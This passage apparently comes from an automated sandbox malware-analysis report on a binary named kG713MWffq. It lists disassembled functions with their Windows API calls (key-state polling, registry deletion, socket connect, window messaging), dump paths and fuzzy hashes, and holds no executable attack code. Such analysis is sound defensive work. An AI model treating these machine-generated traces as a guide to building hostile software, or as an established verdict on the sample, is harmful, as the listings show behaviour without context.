                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 15295421-0
                                                                                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3539004672-0
                                                                                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 327565842-0
                                                                                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                        • String ID:
                                                                                        • API String ID: 2832842796-0
                                                                                        • Opcode ID: 7b3c99b557ace6810e1294e0b9a285d6baa8f81f44fc55ef8670d8c6fada428a
                                                                                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                        • Opcode Fuzzy Hash: 7b3c99b557ace6810e1294e0b9a285d6baa8f81f44fc55ef8670d8c6fada428a
                                                                                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enum$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2095303065-0
                                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 861336768-0
                                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32 ref: 00449598
                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                                        • _wcslen.LIBCMT ref: 0044961A
                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                        • String ID:
                                                                                        • API String ID: 1856069659-0
                                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                        • TrackPopupMenuEx.USER32(02FC6410,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                                        • String ID:
                                                                                        • API String ID: 1300944170-0
                                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1822080540-0
                                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                        • String ID:
                                                                                        • API String ID: 659298297-0
                                                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                        APIs
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02FC1B58,000000F1,00000000,00000000), ref: 00440E6E
                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02FC1B58,000000F1,00000001,00000000), ref: 00440E9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableMessageSend$LongShow
                                                                                        • String ID:
                                                                                        • API String ID: 142311417-0
                                                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                        • _wcslen.LIBCMT ref: 004458FB
                                                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 3087257052-0
                                                                                        • Opcode ID: 1e2b4e7ef89ca78fd01b9ffb4f8b837766eeb74b5d02f2f4ee5553db66ac79b0
                                                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                        • Opcode Fuzzy Hash: 1e2b4e7ef89ca78fd01b9ffb4f8b837766eeb74b5d02f2f4ee5553db66ac79b0
                                                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                        APIs
                                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                        • closesocket.WSOCK32(00000000), ref: 00465481
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 245547762-0
                                                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
